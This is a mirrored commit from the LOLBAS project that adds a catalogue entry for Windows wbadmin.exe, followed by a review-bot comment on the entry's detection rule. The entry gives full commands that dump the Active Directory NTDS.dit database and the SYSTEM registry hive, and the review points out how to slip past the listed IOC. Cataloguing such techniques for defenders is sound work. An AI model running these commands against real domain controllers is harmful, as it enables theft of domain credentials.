mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 23:05:58 +02:00 
	Create wbadmin (#364)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
yml/OSBinaries/Wbadmin.yml (Normal file, 26 lines)
							| @@ -0,0 +1,26 @@ | ||||
| --- | ||||
| Name: wbadmin.exe | ||||
| Description: Windows Backup Administration utility | ||||
| Author: Chris Eastwood | ||||
| Created: 2024-04-05 | ||||
| Commands: | ||||
|   - Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet | ||||
|     Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx) | ||||
|     Usecase: Snapshoting of Active Directory NTDS.dit database | ||||
|     Category: Dump | ||||
|     Privileges: Administrator, Backup Operators, SeBackupPrivilege | ||||
|     MitreID: T1003.003 | ||||
|     OperatingSystem: Windows Server | ||||
|   - Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet | ||||
|     Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers. | ||||
|     Usecase: Dumping of Active Directory NTDS.dit database | ||||
|     Category: Dump | ||||
|     Privileges: Administrator, Backup Operators, SeBackupPrivilege | ||||
|     MitreID: T1003.003 | ||||
|     OperatingSystem: Windows Server | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\wbadmin.exe | ||||
| Detection: | ||||
|   - IOC: wbadmin.exe command lines containing "NTDS" or "NTDS.dit" | ||||
| Resources: | ||||
|   - Link: https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960 | ||||
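Review bot: The Detection block is narrower than the two commands it sits under. Both `-include:` and `-items:` lists also name `C:\Windows\System32\config\SYSTEM`, and the first Description says the data lands in a backup `.vhdx`, yet the only IOC is `wbadmin.exe command lines containing "NTDS" or "NTDS.dit"`; an operator who drops `NTDS.dit` from the list and backs up only the hive, or later mounts the `.vhdx`, goes unmatched. Suggest adding IOCs for `wbadmin start backup` / `wbadmin start recovery` command lines that reference `\Windows\System32\config\` or `-notRestoreAcl`, and for the `.vhdx` written under the `-backupTarget:` path. Minor: `Usecase: Snapshoting of Active Directory NTDS.dit database` should read `Snapshotting`, and the Description of the recovery command could state that `wbadmin get versions` must be run on the host holding the backup, since the `<VERSIONIDENTIFIER>` placeholder is otherwise unexplained to a reader of the rendered entry.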